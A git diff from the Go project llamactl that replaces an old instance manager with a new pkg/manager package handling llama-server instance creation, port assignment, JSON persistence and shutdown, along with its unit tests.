currentOptions := instance.GetOptions()
if currentOptions.Model != originalOptions.Model {
t.Error("Options should not change when setting nil options")
}
}
func TestGetProxy(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Host: "localhost",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
// Get proxy for the first time
proxy1, err := instance.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 == nil {
t.Error("Expected proxy to be created")
}
// Get proxy again - should return cached version
proxy2, err := instance.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 != proxy2 {
t.Error("Expected cached proxy to be returned")
}
}
func TestMarshalJSON(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
data, err := json.Marshal(instance)
if err != nil {
t.Fatalf("JSON marshal failed: %v", err)
}
// Check that JSON contains expected fields
var result map[string]interface{}
err = json.Unmarshal(data, &result)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if result["name"] != "test-instance" {
t.Errorf("Expected name 'test-instance', got %v", result["name"])
}
if result["running"] != false {
t.Errorf("Expected running false, got %v", result["running"])
}
// Check that options are included
options_data, ok := result["options"]
if !ok {
t.Error("Expected options to be included in JSON")
}
options_map, ok := options_data.(map[string]interface{})
if !ok {
t.Error("Expected options to be a map")
}
if options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", options_map["model"])
}
}
func TestUnmarshalJSON(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": true,
"options": {
"model": "/path/to/model.gguf",
"port": 8080,
"auto_restart": false,
"max_restarts": 5
}
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if !instance.Running {
t.Error("Expected running to be true")
}
opts := instance.GetOptions()
if opts == nil {
t.Fatal("Expected options to be set")
}
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
}
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 5 {
t.Errorf("Expected MaxRestarts to be 5, got %v", opts.MaxRestarts)
}
}
func TestUnmarshalJSON_PartialOptions(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": false,
"options": {
"model": "/path/to/model.gguf"
}
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
opts := instance.GetOptions()
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
// Note: Defaults are NOT applied during unmarshaling
// They should only be applied by NewInstance or SetOptions
if opts.AutoRestart != nil {
t.Error("Expected AutoRestart to be nil (no defaults applied during unmarshal)")
}
}
func TestUnmarshalJSON_NoOptions(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": false
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("Expected running to be false")
}
opts := instance.GetOptions()
if opts != nil {
t.Error("Expected options to be nil when not provided in JSON")
}
}
func TestCreateInstanceOptionsValidation(t *testing.T) {
tests := []struct {
name string
maxRestarts *int
restartDelay *int
expectedMax int
expectedDelay int
}{
{
name: "nil values",
maxRestarts: nil,
restartDelay: nil,
expectedMax: 0, // Should remain nil, but we can't easily test nil in this structure
expectedDelay: 0,
},
{
name: "valid positive values",
maxRestarts: intPtr(10),
restartDelay: intPtr(30),
expectedMax: 10,
expectedDelay: 30,
},
{
name: "zero values",
maxRestarts: intPtr(0),
restartDelay: intPtr(0),
expectedMax: 0,
expectedDelay: 0,
},
{
name: "negative values should be corrected",
maxRestarts: intPtr(-5),
restartDelay: intPtr(-10),
expectedMax: 0,
expectedDelay: 0,
},
}
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &llamactl.CreateInstanceOptions{
MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test", globalSettings, options)
opts := instance.GetOptions()
if tt.maxRestarts != nil {
if opts.MaxRestarts == nil {
t.Error("Expected MaxRestarts to be set")
} else if *opts.MaxRestarts != tt.expectedMax {
t.Errorf("Expected MaxRestarts %d, got %d", tt.expectedMax, *opts.MaxRestarts)
}
}
if tt.restartDelay != nil {
if opts.RestartDelay == nil {
t.Error("Expected RestartDelay to be set")
} else if *opts.RestartDelay != tt.expectedDelay {
t.Errorf("Expected RestartDelay %d, got %d", tt.expectedDelay, *opts.RestartDelay)
}
}
})
}
}

View File

@@ -1,249 +0,0 @@
package llamactl
import (
"fmt"
"sync"
)
// InstanceManager defines the interface for managing instances of the llama server.
type InstanceManager interface {
ListInstances() ([]*Instance, error)
CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
GetInstance(name string) (*Instance, error)
UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
DeleteInstance(name string) error
StartInstance(name string) (*Instance, error)
StopInstance(name string) (*Instance, error)
RestartInstance(name string) (*Instance, error)
GetInstanceLogs(name string) (string, error)
}
type instanceManager struct {
mu sync.RWMutex
instances map[string]*Instance
ports map[int]bool
instancesConfig InstancesConfig
}
// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(instancesConfig InstancesConfig) InstanceManager {
return &instanceManager{
instances: make(map[string]*Instance),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
}
}
// ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*Instance, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instances := make([]*Instance, 0, len(im.instances))
for _, instance := range im.instances {
instances = append(instances, instance)
}
return instances, nil
}
// CreateInstance creates a new instance with the given options and returns it.
// The instance is initially in a "stopped" state.
func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
}
err := ValidateInstanceName(name)
if err != nil {
return nil, err
}
err = ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
im.mu.Lock()
defer im.mu.Unlock()
// Check if instance with this name already exists
if im.instances[name] != nil {
return nil, fmt.Errorf("instance with name %s already exists", name)
}
// Assign a port if not specified
if options.Port == 0 {
port, err := im.getNextAvailablePort()
if err != nil {
return nil, fmt.Errorf("failed to get next available port: %w", err)
}
options.Port = port
} else {
// Validate the specified port
if _, exists := im.ports[options.Port]; exists {
return nil, fmt.Errorf("port %d is already in use", options.Port)
}
im.ports[options.Port] = true
}
instance := NewInstance(name, &im.instancesConfig, options)
im.instances[instance.Name] = instance
im.ports[options.Port] = true
return instance, nil
}
// GetInstance retrieves an instance by its name.
func (im *instanceManager) GetInstance(name string) (*Instance, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instance, exists := im.instances[name]
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
return instance, nil
}
// UpdateInstance updates the options of an existing instance and returns it.
// If the instance is running, it will be restarted to apply the new options.
func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
err := ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
// Check if instance is running before updating options
wasRunning := instance.Running
// If the instance is running, stop it first
if wasRunning {
if err := instance.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s for update: %w", name, err)
}
}
// Now update the options while the instance is stopped
instance.SetOptions(options)
// If it was running before, start it again with the new options
if wasRunning {
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s after update: %w", name, err)
}
}
return instance, nil
}
// DeleteInstance removes stopped instance by its name.
func (im *instanceManager) DeleteInstance(name string) error {
im.mu.Lock()
defer im.mu.Unlock()
_, exists := im.instances[name]
if !exists {
return fmt.Errorf("instance with name %s not found", name)
}
if im.instances[name].Running {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
}
delete(im.ports, im.instances[name].options.Port)
delete(im.instances, name)
return nil
}
// StartInstance starts a stopped instance and returns it.
// If the instance is already running, it returns an error.
func (im *instanceManager) StartInstance(name string) (*Instance, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if instance.Running {
return instance, fmt.Errorf("instance with name %s is already running", name)
}
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
return instance, nil
}
// StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*Instance, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if !instance.Running {
return instance, fmt.Errorf("instance with name %s is already stopped", name)
}
if err := instance.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
}
return instance, nil
}
// RestartInstance stops and then starts an instance, returning the updated instance.
func (im *instanceManager) RestartInstance(name string) (*Instance, error) {
instance, err := im.StopInstance(name)
if err != nil {
return nil, err
}
return im.StartInstance(instance.Name)
}
// GetInstanceLogs retrieves the logs for a specific instance by its name.
func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
im.mu.RLock()
_, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return "", fmt.Errorf("instance with name %s not found", name)
}
// TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil
}
func (im *instanceManager) getNextAvailablePort() (int, error) {
portRange := im.instancesConfig.PortRange
for port := portRange[0]; port <= portRange[1]; port++ {
if !im.ports[port] {
im.ports[port] = true
return port, nil
}
}
return 0, fmt.Errorf("no available ports in the specified range")
}

296
pkg/manager/manager.go Normal file
View File

@@ -0,0 +1,296 @@
package manager
import (
"encoding/json"
"fmt"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"log"
"os"
"path/filepath"
"strings"
"sync"
"time"
)
// InstanceManager defines the interface for managing instances of the llama server.
type InstanceManager interface {
ListInstances() ([]*instance.Process, error)
CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
GetInstance(name string) (*instance.Process, error)
UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
DeleteInstance(name string) error
StartInstance(name string) (*instance.Process, error)
IsMaxRunningInstancesReached() bool
StopInstance(name string) (*instance.Process, error)
EvictLRUInstance() error
RestartInstance(name string) (*instance.Process, error)
GetInstanceLogs(name string) (string, error)
Shutdown()
}
type instanceManager struct {
mu sync.RWMutex
instances map[string]*instance.Process
runningInstances map[string]struct{}
ports map[int]bool
instancesConfig config.InstancesConfig
// Timeout checker
timeoutChecker *time.Ticker
shutdownChan chan struct{}
shutdownDone chan struct{}
isShutdown bool
}
// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(instancesConfig config.InstancesConfig) InstanceManager {
if instancesConfig.TimeoutCheckInterval <= 0 {
instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
}
im := &instanceManager{
instances: make(map[string]*instance.Process),
runningInstances: make(map[string]struct{}),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute),
shutdownChan: make(chan struct{}),
shutdownDone: make(chan struct{}),
}
// Load existing instances from disk
if err := im.loadInstances(); err != nil {
log.Printf("Error loading instances: %v", err)
}
// Start the timeout checker goroutine after initialization is complete
go func() {
defer close(im.shutdownDone)
for {
select {
case <-im.timeoutChecker.C:
im.checkAllTimeouts()
case <-im.shutdownChan:
return // Exit goroutine on shutdown
}
}
}()
return im
}
func (im *instanceManager) getNextAvailablePort() (int, error) {
portRange := im.instancesConfig.PortRange
for port := portRange[0]; port <= portRange[1]; port++ {
if !im.ports[port] {
im.ports[port] = true
return port, nil
}
}
return 0, fmt.Errorf("no available ports in the specified range")
}
// persistInstance saves an instance to its JSON file
func (im *instanceManager) persistInstance(instance *instance.Process) error {
if im.instancesConfig.InstancesDir == "" {
return nil // Persistence disabled
}
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
tempPath := instancePath + ".tmp"
// Serialize instance to JSON
jsonData, err := json.MarshalIndent(instance, "", " ")
if err != nil {
return fmt.Errorf("failed to marshal instance %s: %w", instance.Name, err)
}
// Write to temporary file first
if err := os.WriteFile(tempPath, jsonData, 0644); err != nil {
return fmt.Errorf("failed to write temp file for instance %s: %w", instance.Name, err)
}
// Atomic rename
if err := os.Rename(tempPath, instancePath); err != nil {
os.Remove(tempPath) // Clean up temp file
return fmt.Errorf("failed to rename temp file for instance %s: %w", instance.Name, err)
}
return nil
}
func (im *instanceManager) Shutdown() {
im.mu.Lock()
// Check if already shutdown
if im.isShutdown {
im.mu.Unlock()
return
}
im.isShutdown = true
// Signal the timeout checker to stop
close(im.shutdownChan)
// Create a list of running instances to stop
var runningInstances []*instance.Process
var runningNames []string
for name, inst := range im.instances {
if inst.IsRunning() {
runningInstances = append(runningInstances, inst)
runningNames = append(runningNames, name)
}
}
// Release lock before stopping instances to avoid deadlock
im.mu.Unlock()
// Wait for the timeout checker goroutine to actually stop
<-im.shutdownDone
// Now stop the ticker
if im.timeoutChecker != nil {
im.timeoutChecker.Stop()
}
// Stop instances without holding the manager lock
var wg sync.WaitGroup
wg.Add(len(runningInstances))
for i, inst := range runningInstances {
go func(name string, inst *instance.Process) {
defer wg.Done()
fmt.Printf("Stopping instance %s...\n", name)
// Attempt to stop the instance gracefully
if err := inst.Stop(); err != nil {
fmt.Printf("Error stopping instance %s: %v\n", name, err)
}
}(runningNames[i], inst)
}
wg.Wait()
fmt.Println("All instances stopped.")
}
// loadInstances restores all instances from disk
func (im *instanceManager) loadInstances() error {
if im.instancesConfig.InstancesDir == "" {
return nil // Persistence disabled
}
// Check if instances directory exists
if _, err := os.Stat(im.instancesConfig.InstancesDir); os.IsNotExist(err) {
return nil // No instances directory, start fresh
}
// Read all JSON files from instances directory
files, err := os.ReadDir(im.instancesConfig.InstancesDir)
if err != nil {
return fmt.Errorf("failed to read instances directory: %w", err)
}
loadedCount := 0
for _, file := range files {
if file.IsDir() || !strings.HasSuffix(file.Name(), ".json") {
continue
}
instanceName := strings.TrimSuffix(file.Name(), ".json")
instancePath := filepath.Join(im.instancesConfig.InstancesDir, file.Name())
if err := im.loadInstance(instanceName, instancePath); err != nil {
log.Printf("Failed to load instance %s: %v", instanceName, err)
continue
}
loadedCount++
}
if loadedCount > 0 {
log.Printf("Loaded %d instances from persistence", loadedCount)
// Auto-start instances that have auto-restart enabled
go im.autoStartInstances()
}
return nil
}
// loadInstance loads a single instance from its JSON file
func (im *instanceManager) loadInstance(name, path string) error {
data, err := os.ReadFile(path)
if err != nil {
return fmt.Errorf("failed to read instance file: %w", err)
}
var persistedInstance instance.Process
if err := json.Unmarshal(data, &persistedInstance); err != nil {
return fmt.Errorf("failed to unmarshal instance: %w", err)
}
// Validate the instance name matches the filename
if persistedInstance.Name != name {
return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
}
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(persistedInstance.Name, oldStatus, newStatus)
}
// Create new inst using NewInstance (handles validation, defaults, setup)
inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions(), statusCallback)
// Restore persisted fields that NewInstance doesn't set
inst.Created = persistedInstance.Created
inst.SetStatus(persistedInstance.Status)
// Check for port conflicts and add to maps
if inst.GetPort() > 0 {
port := inst.GetPort()
if im.ports[port] {
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
}
im.ports[port] = true
}
im.instances[name] = inst
return nil
}
// autoStartInstances starts instances that were running when persisted and have auto-restart enabled
func (im *instanceManager) autoStartInstances() {
im.mu.RLock()
var instancesToStart []*instance.Process
for _, inst := range im.instances {
if inst.IsRunning() && // Was running when persisted
inst.GetOptions() != nil &&
inst.GetOptions().AutoRestart != nil &&
*inst.GetOptions().AutoRestart {
instancesToStart = append(instancesToStart, inst)
}
}
im.mu.RUnlock()
for _, inst := range instancesToStart {
log.Printf("Auto-starting instance %s", inst.Name)
// Reset running state before starting (since Start() expects stopped instance)
inst.SetStatus(instance.Stopped)
if err := inst.Start(); err != nil {
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
}
}
}
func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.InstanceStatus) {
im.mu.Lock()
defer im.mu.Unlock()
if newStatus == instance.Running {
im.runningInstances[name] = struct{}{}
} else {
delete(im.runningInstances, name)
}
}

186
pkg/manager/manager_test.go Normal file
View File

@@ -0,0 +1,186 @@
package manager_test
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"os"
"path/filepath"
"strings"
"sync"
"testing"
)
func TestNewInstanceManager(t *testing.T) {
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 5,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
mgr := manager.NewInstanceManager(cfg)
if mgr == nil {
t.Fatal("NewInstanceManager returned nil")
}
// Test initial state
instances, err := mgr.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected empty instance list, got %d instances", len(instances))
}
}
func TestPersistence(t *testing.T) {
tempDir := t.TempDir()
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
TimeoutCheckInterval: 5,
}
// Test instance persistence on creation
manager1 := manager.NewInstanceManager(cfg)
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
_, err := manager1.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Check that JSON file was created
expectedPath := filepath.Join(tempDir, "test-instance.json")
if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
t.Errorf("Expected persistence file %s to exist", expectedPath)
}
// Test loading instances from disk
manager2 := manager.NewInstanceManager(cfg)
instances, err := manager2.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Fatalf("Expected 1 loaded instance, got %d", len(instances))
}
if instances[0].Name != "test-instance" {
t.Errorf("Expected loaded instance name 'test-instance', got %q", instances[0].Name)
}
// Test port map populated from loaded instances (port conflict should be detected)
_, err = manager2.CreateInstance("new-instance", options) // Same port
if err == nil || !strings.Contains(err.Error(), "port") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test file deletion on instance deletion
err = manager2.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
if _, err := os.Stat(expectedPath); !os.IsNotExist(err) {
t.Error("Expected persistence file to be deleted")
}
}
func TestConcurrentAccess(t *testing.T) {
mgr := createTestManager()
defer mgr.Shutdown()
// Test concurrent operations
var wg sync.WaitGroup
errChan := make(chan error, 10)
// Concurrent instance creation
for i := range 5 {
wg.Add(1)
go func(index int) {
defer wg.Done()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instanceName := fmt.Sprintf("concurrent-test-%d", index)
if _, err := mgr.CreateInstance(instanceName, options); err != nil {
errChan <- err
}
}(i)
}
// Concurrent list operations
for i := 0; i < 3; i++ {
wg.Add(1)
go func() {
defer wg.Done()
if _, err := mgr.ListInstances(); err != nil {
errChan <- err
}
}()
}
wg.Wait()
close(errChan)
// Check for any errors during concurrent access
for err := range errChan {
t.Errorf("Concurrent access error: %v", err)
}
}
func TestShutdown(t *testing.T) {
mgr := createTestManager()
// Create test instance
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mgr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Shutdown should not panic
mgr.Shutdown()
// Multiple shutdowns should not panic
mgr.Shutdown()
}
// Helper function to create a test manager with standard config
func createTestManager() manager.InstanceManager {
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 10,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
return manager.NewInstanceManager(cfg)
}

300
pkg/manager/operations.go Normal file
View File

@@ -0,0 +1,300 @@
package manager
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"llamactl/pkg/validation"
"os"
"path/filepath"
)
type MaxRunningInstancesError error
// ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instances := make([]*instance.Process, 0, len(im.instances))
for _, inst := range im.instances {
instances = append(instances, inst)
}
return instances, nil
}
// CreateInstance creates a new instance with the given options and returns it.
// The instance is initially in a "stopped" state.
func (im *instanceManager) CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
name, err := validation.ValidateInstanceName(name)
if err != nil {
return nil, err
}
err = validation.ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
im.mu.Lock()
defer im.mu.Unlock()
// Check max instances limit after acquiring the lock
if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
}
// Check if instance with this name already exists
if im.instances[name] != nil {
return nil, fmt.Errorf("instance with name %s already exists", name)
}
// Assign and validate port for backend-specific options
if err := im.assignAndValidatePort(options); err != nil {
return nil, err
}
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(name, oldStatus, newStatus)
}
inst := instance.NewInstance(name, &im.instancesConfig, options, statusCallback)
im.instances[inst.Name] = inst
if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return inst, nil
}
// GetInstance retrieves an instance by its name.
func (im *instanceManager) GetInstance(name string) (*instance.Process, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instance, exists := im.instances[name]
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
return instance, nil
}
// UpdateInstance updates the options of an existing instance and returns it.
// If the instance is running, it will be restarted to apply the new options.
func (im *instanceManager) UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
err := validation.ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
// Check if instance is running before updating options
wasRunning := instance.IsRunning()
// If the instance is running, stop it first
if wasRunning {
if err := instance.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s for update: %w", name, err)
}
}
// Now update the options while the instance is stopped
instance.SetOptions(options)
// If it was running before, start it again with the new options
if wasRunning {
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s after update: %w", name, err)
}
}
im.mu.Lock()
defer im.mu.Unlock()
if err := im.persistInstance(instance); err != nil {
return nil, fmt.Errorf("failed to persist updated instance %s: %w", name, err)
}
return instance, nil
}
// DeleteInstance removes stopped instance by its name.
func (im *instanceManager) DeleteInstance(name string) error {
im.mu.Lock()
defer im.mu.Unlock()
instance, exists := im.instances[name]
if !exists {
return fmt.Errorf("instance with name %s not found", name)
}
if instance.IsRunning() {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
}
delete(im.ports, instance.GetPort())
delete(im.instances, name)
// Delete the instance's config file if persistence is enabled
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
if err := os.Remove(instancePath); err != nil && !os.IsNotExist(err) {
return fmt.Errorf("failed to delete config file for instance %s: %w", instance.Name, err)
}
return nil
}
// StartInstance starts a stopped instance and returns it.
// If the instance is already running, it returns an error.
func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
maxRunningExceeded := len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances && im.instancesConfig.MaxRunningInstances != -1
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already running", name)
}
if maxRunningExceeded {
return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.instancesConfig.MaxRunningInstances))
}
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
im.mu.Lock()
defer im.mu.Unlock()
err := im.persistInstance(instance)
if err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return instance, nil
}
func (im *instanceManager) IsMaxRunningInstancesReached() bool {
im.mu.RLock()
defer im.mu.RUnlock()
if im.instancesConfig.MaxRunningInstances != -1 && len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances {
return true
}
return false
}
// StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if !instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already stopped", name)
}
if err := instance.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
}
im.mu.Lock()
defer im.mu.Unlock()
err := im.persistInstance(instance)
if err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return instance, nil
}
// RestartInstance stops and then starts an instance, returning the updated instance.
func (im *instanceManager) RestartInstance(name string) (*instance.Process, error) {
instance, err := im.StopInstance(name)
if err != nil {
return nil, err
}
return im.StartInstance(instance.Name)
}
// GetInstanceLogs retrieves the logs for a specific instance by its name.
func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
im.mu.RLock()
_, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return "", fmt.Errorf("instance with name %s not found", name)
}
// TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil
}
// getPortFromOptions extracts the port from backend-specific options
func (im *instanceManager) getPortFromOptions(options *instance.CreateInstanceOptions) int {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
return options.LlamaServerOptions.Port
}
}
return 0
}
// setPortInOptions sets the port in backend-specific options
func (im *instanceManager) setPortInOptions(options *instance.CreateInstanceOptions, port int) {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
options.LlamaServerOptions.Port = port
}
}
}
// assignAndValidatePort assigns a port if not specified and validates it's not in use
func (im *instanceManager) assignAndValidatePort(options *instance.CreateInstanceOptions) error {
currentPort := im.getPortFromOptions(options)
if currentPort == 0 {
// Assign a port if not specified
port, err := im.getNextAvailablePort()
if err != nil {
return fmt.Errorf("failed to get next available port: %w", err)
}
im.setPortInOptions(options, port)
// Mark the port as used
im.ports[port] = true
} else {
// Validate the specified port
if _, exists := im.ports[currentPort]; exists {
return fmt.Errorf("port %d is already in use", currentPort)
}
// Mark the port as used
im.ports[currentPort] = true
}
return nil
}

View File

@@ -0,0 +1,229 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"strings"
"testing"
)
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
